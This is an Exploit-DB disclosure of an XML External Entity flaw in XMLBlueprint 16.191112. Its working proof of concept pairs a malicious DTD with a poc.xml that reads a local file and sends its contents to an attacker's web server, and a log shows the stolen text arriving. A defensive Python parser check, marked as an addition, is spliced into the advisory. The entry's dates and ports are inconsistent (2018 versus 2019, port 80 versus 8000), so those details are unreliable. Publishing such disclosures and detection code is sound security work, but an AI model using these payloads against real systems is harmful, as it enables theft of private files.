XMLBlueprint 16.191112 – XML External Entity Injection

  • Author: Javier Olmedo
    Date: 2020-01-29
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47974/
  • # Exploit Title: XMLBlueprint 16.191112 - XML External Entity Injection
    # Exploit Author: Javier Olmedo
    # Date: 2018-11-14
    # Vendor: XMLBlueprint XML Editor
    # Software Link: https://www.xmlblueprint.com/update/download-64bit.exe
    # Affected Version: 16.191112 and before
    # Patched Version: unpatched
    # Category: Local
    # Platform: XML
    # Tested on: Windows 10 Pro
    # CWE: https://cwe.mitre.org/data/definitions/611.html
    # CVE: 2019-19032
    # References:
    # https://hackpuntes.com/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/
     
    # 1. Technical Description
    # XMLBlueprint XML Editor version 16.191112 and earlier is affected by an XML External Entity
    # (XXE) Injection vulnerability triggered by a malicious XML file. This allows a malicious user
    # to read arbitrary files.
     
    # 2. Proof Of Concept (PoC)
    # 2.1 Start a webserver to receive the connection.
    
    python -m SimpleHTTPServer 80
    
    # 2.2 Upload the payload.dtd file to your web server.
    
    <?xml version="1.0" encoding="UTF-8"?>
    <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>">
    %all;
    
    # 2.3 Create a secret.txt file with any content on the desktop.
    
    # 2.4 Open poc.xml and click XML -> Validate.
    
    <?xml version="1.0"?>
    <!DOCTYPE test [
    <!ENTITY % file SYSTEM "file:///C:\Users\jolmedo\Desktop\secret.txt">
    <!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">
    %dtd;]>
    <pwn>&send;</pwn>
    
    # 2.5 Your web server will receive a request containing the contents of the secret.txt file.
    
    Serving HTTP on 0.0.0.0 port 8000 ...
    192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 -
    192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -
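A defender-side check for the parser behaviour this PoC relies on, added here as an example and not part of the original advisory: it parses a document with Python's expat while never expanding parameter entities, refusing any external entity load, and recording every entity or DTD subset declared with a SYSTEM/PUBLIC identifier. The sample documents are constructed to mirror the poc.xml above (the file path is a placeholder) and `inspect_xml` is a hypothetical helper name.

```python
import xml.parsers.expat as expat

# Constructed sample mirroring the structure of the advisory's poc.xml:
# one parameter entity pointing at a local file, one pulling a remote DTD.
POC_XML = """<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "file:///C:/Users/example/Desktop/secret.txt">
<!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>"""

# Constructed benign documents: no DTD at all, and an internal-only entity.
PLAIN_XML = '<?xml version="1.0"?><doc><item>hello</item></doc>'
INTERNAL_ENTITY_XML = '<!DOCTYPE d [<!ENTITY greet "hi">]><d>&greet;</d>'


def inspect_xml(document):
    """Parse with expat, refusing anything that would resolve an external resource.

    Returns (accepted, findings). Parameter entities are never expanded, every
    entity or DOCTYPE declared with a SYSTEM/PUBLIC identifier is recorded, and
    any attempt to load an external entity body is refused (returning 0 from the
    handler makes expat abort the parse instead of fetching the resource).
    """
    findings = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id or public_id:
            findings.append(f"external DTD subset for <!DOCTYPE {name}>: {system_id}")

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            kind = "parameter" if is_param else "general"
            findings.append(f"external {kind} entity {name!r} -> {system_id}")

    def on_external_ref(context, base, system_id, public_id):
        findings.append(f"refused external entity load: {system_id}")
        return 0  # abort rather than resolve the reference

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref

    try:
        parser.Parse(document, True)
    except expat.ExpatError as err:
        findings.append(f"parse aborted: {err}")
    return (not findings), findings
```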
    
    # 3. Timeline
    # 13 November 2019 - [RESEARCHER] Discovery
    # 13 November 2019 - [RESEARCHER] Report to vendor support
    # 14 November 2019 - [DEVELOPER] Vulnerability not recognized
    # 15 November 2019 - [RESEARCHER] Detailed vulnerability report
    # 22 November 2019 - [RESEARCHER] Public disclosure
    
    # 4. Disclaimer
    # The information contained in this notice is provided without any guarantee of use or otherwise.
    # The redistribution of this notice is explicitly permitted for insertion into vulnerability
    # databases, provided that it is not modified and due credit is granted to the author.
    # The author prohibits the malicious use of the information contained herein and accepts no responsibility.
    # All content (c) Javier Olmedo